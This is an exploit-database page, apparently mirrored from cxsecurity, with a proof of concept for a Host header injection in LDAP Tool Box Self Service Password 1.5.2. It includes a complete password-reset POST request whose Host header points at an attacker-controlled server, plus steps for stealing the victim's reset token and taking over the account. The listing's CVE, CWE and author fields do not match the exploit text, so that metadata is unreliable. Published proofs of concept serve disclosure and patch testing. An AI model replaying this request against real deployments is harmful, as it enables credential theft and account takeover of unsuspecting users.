Advertisement






LDAP Tool Box Self Service Password 1.5.2 Account Takeover

CVE Category Price Severity
CVE-2021-32688 CWE-918 Not specified High
Author Risk Exploitation Type Date
Hamed Khoramyar High Remote 2023-04-06
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040027

Below is a copy:

LDAP Tool Box Self Service Password 1.5.2 Account Takeover
# Exploit Title:  LDAP Tool Box Self Service Password v1.5.2 -  Account takeover
# Date: 02/17/2023
# Exploit Author: Tahar BENNACEF (aka tar.gz)
# Software Link: https://github.com/ltb-project/self-service-password
# Version: 1.5.2
# Tested on: Ubuntu

Self Service Password is a PHP application that allows users to change
their password in an LDAP directory.
It is very useful to get back an account with waiting an action from an
administration especially in Active Directory environment

The password reset feature is prone to an HTTP Host header vulnerability
allowing an attacker to tamper the password-reset mail sent to his victim
allowing him to potentially steal his victim's valid reset token. The
attacker can then use it to perform account takeover


*Step to reproduce*

1. Request a password reset request targeting your victim and setting in
the request HTTP Host header the value of a server under your control

POST /?action=sendtoken HTTP/1.1
Host: *111.111.111.111*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Origin: https://portal-lab.ngp.infra
Referer: https://portal-lab.ngp.infra/?action=sendtoken
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

login=test.reset


As the vulnerable web application's relying on the Host header of the
password-reset request to craft the password-reset mail. The victim
receive a mail with a tampered link
[image: image.png]

2. Start a webserver and wait for the victim to click on the link

If the victim click on this tampered link, he will sent his password reset
token to the server set in the password-reset request's HTTP Host header
[image: image.png]

3. Use the stolen token to reset victim's account password


Best regards

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum